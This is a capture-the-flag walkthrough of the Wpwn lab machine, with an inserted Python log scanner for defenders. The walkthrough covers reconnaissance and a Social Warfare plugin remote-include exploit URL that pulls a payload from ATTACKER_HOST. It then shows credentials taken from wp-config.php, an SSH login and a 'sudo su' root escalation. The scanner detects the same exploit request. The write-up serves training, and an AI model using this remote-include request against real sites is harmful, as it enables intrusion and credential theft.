Wpwn OffSec Walkthrough: This is a walkthrough of Wpwn from the Offensive Security playground. Let us see how we can compromise this machine. It is available in OffSec Play and on VulnHub.
Reconnaissance
We run an nmap scan to see which ports are open and which services are running on them.

We get back the following result showing multiple open ports:
- Port 22: OpenSSH 7.9p1
- Port 80: http
Enumeration
- Port 80: On visiting the website we are not presented with much information.
- Let's use gobuster and see if anything comes up.
- We found only one directory; on visiting /wordpress, we are presented with the page below.

- After this I ran wpscan, which reported a vulnerable plugin.


Exploitation
- We will use https://www.exploit-db.com/exploits/46794
- Exploitation POC: https://wpscan.com/vulnerability/9259

- As suggested in the PoC, I created the payload file and started a Python HTTP server to host it.

- Vulnerable URL: http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

- We got a valid user: takis
- Now we will read the “wp-config.php” file.

- Reading the file gave us a potential password: R3&]vzhHmMn9,:-5
- Tried SSH with the user takis and that password, and got a user-privilege shell.
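As an added defender's example (not part of the original walkthrough), the check below scans web-server access logs for the request pattern used above: a hit on /wp-admin/admin-post.php with swp_debug=load_options and an swp_url parameter, the Social Warfare plugin RCE referenced in Exploit-DB 46794. The log lines, IP addresses and the site host example.test are constructed for the example; any hit on the pattern deserves an alert, and an swp_url pointing off-site is the PoC's exploitation shape.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2021:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2021:10:01:40 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://10.0.0.9:8000/payload.txt HTTP/1.1" 200 812 "-" "python-requests/2.25"
10.0.0.5 - - [12/Mar/2021:10:02:11 +0000] "GET /wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2021:10:02:30 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://example.test/wp-content/x.txt HTTP/1.1" 200 812 "-" "curl/7.74"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_swp_load_options(log_text, site_host):
    """Return one finding per request that hits admin-post.php with
    swp_debug=load_options. 'external' is True when swp_url names a host
    other than site_host (the remote-include shape of the PoC)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        target = urlsplit(m.group("path"))
        if not target.path.endswith("/wp-admin/admin-post.php"):
            continue
        query = parse_qs(target.query)
        if query.get("swp_debug", [""])[0] != "load_options":
            continue
        remote = query.get("swp_url", [""])[0]
        remote_host = urlsplit(remote).hostname or ""
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": m.group("status"),
            "swp_url": remote,
            "external": bool(remote_host) and remote_host != site_host,
        })
    return findings


if __name__ == "__main__":
    for hit in flag_swp_load_options(SAMPLE_LOG, "example.test"):
        print(hit)
```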

Privilege Escalation
- Checked the user's sudo privileges with the command "sudo -l".
- The user can run any command without a password, so we escalate privileges with "sudo su" and get a root shell on the target machine.

That completes this lab; see you in the next one 😉